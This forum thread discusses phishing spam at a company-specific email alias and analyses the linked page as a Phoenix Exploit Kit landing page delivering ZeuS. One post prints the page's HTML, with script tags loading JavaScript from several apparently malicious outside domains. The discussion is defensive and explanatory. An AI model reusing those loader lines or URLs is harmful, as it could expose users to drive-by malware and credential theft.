I make new addresses for the different businesses I email to, so I can tell who is responsible for spam and phishing.

I started receiving phishing emails a few days ago to the address I created for emailing Smith Micro. I think they're the ones that bought out Stuffit? Anyone else getting these?

Both times in the past I've tried to call and complain about someone getting me on a spam/phish list (Ford and NewEgg most recently) they've denied the possibility of any involvement. (not surprising I suppose)

Generally speaking, if you start getting spam to an email address, therre are a few possibilities:

- The spammers found it on a Web site, forum, or email group.
- The spammers found it by doing a dictionary attack.
- You used it on a Web site or online ordering system that was hacked.
- You gave it to someone who gave, sold, or rented it to the spammers.
- You gave it to someone who was then hacked.
- You gave it to someone who is infected with an email-scraping virus.

If this email was created only for Smith Micro, that rules out the first two possibilities, leaving only the bottom four. Smith Micro probably didn't intentionally sell it on to phishers, which means they have been hacked, they are using a computer infected with a virus, or the spammers found the email address by using a brute-force dictionary attack.

How unusual is the email address? Does it use dictionary words?

I typically use "v1" and the company name, @vftp.net as my alias. I obviously don't post it publicly. The prepending of "v1" to the start of the addresses makes them fairly resistant to dictionary attacks. I've checked my server logs a few times in the past looking for such mischief and other than the expected dictionary attempts I don't see much.

So I follow the same conclusion as you, hacked or botnetted. Either way probably a waste of my time to contact them, they're unlikely to admit to either.

And I continue to get spam that looks like my "intuit order" is ready. Spam emails originate from Tunisia. The link tries to get me to go here:

http//livonya.com/BNCGCPNP/index.html
(attempting to autolink that url was not appreciated, ubb)

which does a really odd thing, it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

Or maybe a cocktail? Curling that URL gives:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://africafe.hu/xyv9H9GN/js.js"></script>
<script type="text/javascript" src="http://asflexs.com/5w5txgvh/js.js"></script>
<script type="text/javascript" src="http://phreklam.com/zWNrFqKG/js.js"></script>
<script type="text/javascript" src="http://zizula.ro/RxTXmiNk/js.js"></script>

</html>

It's the Phoenix Exploit Kit.

The Web site looks at the browser, platform, plugins, and other configuration information, then attempts a cocktail of browser, Java, Flash, and PDF exploits to download the W32/ZeuS malware. I've been seeing a lot of these lately.

W32/ZeuS is a modular, programmable, configurable malware strain that's sold in underground carder communities as a do-it-yourself kit. Once it infects a computer, it waits silently until a person attempts to visit a bank site or a site like PayPal. When that happens, it begins keystroke logging and then sends the person's login credentials to a server under the control of the person who set it up. It uses advanced encryption and other techniques to mask its communication with the server.

Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.

> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.

> [...] it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

After seeing that it's Windows only I entered the URL and was taken to what looks like a clothing sales site.

The home page displayed a log-in pane with name and password pre-entered, which I wasn't curious enough to click on.

I forgot to mention in my last post that somewhere on the road to that shopping site I acquired a microsoft.com cookie. Curious?

I'd label it curious. I just checked my cookies and, although I have various Microsoft sites I visit (due to needing support for my Office software), I do not have a cookie called microsoft.com.

AFAIK all the exploits it is using and attempting to install are for windows. After trying to compromise your browser and failing, it dumps you off at some other web page.

Wow. I didn't know that. What do you do then? reformat and restore safe documents?

Yep. There are several exploit kits that are shopped around to malware writers to help them spread their malware, the two most common being the Blackhole Exploit Kit and the Phoenix Exploit Kit. Both can be configured to drop any malware (not just ZeuS) and both can be configured to send the user elsewhere if the exploits all fail or if the page is loaded in a way that the malware writer doesn't want.

For example, the Phoenix Exploit Kit is often configured in such a way that if you surf to it directly it'll redirect elsewhere; it attempts the exploit if it's loaded in an iFrame. The bad guys then compromise other sites and inject iFrames into them.



Yep. Microsoft Security Essentials can remove some of the older variants of ZeuS, but for modern variants, or for some other similar malware? Yep, reformat and restore is Microsoft's recommended course of action.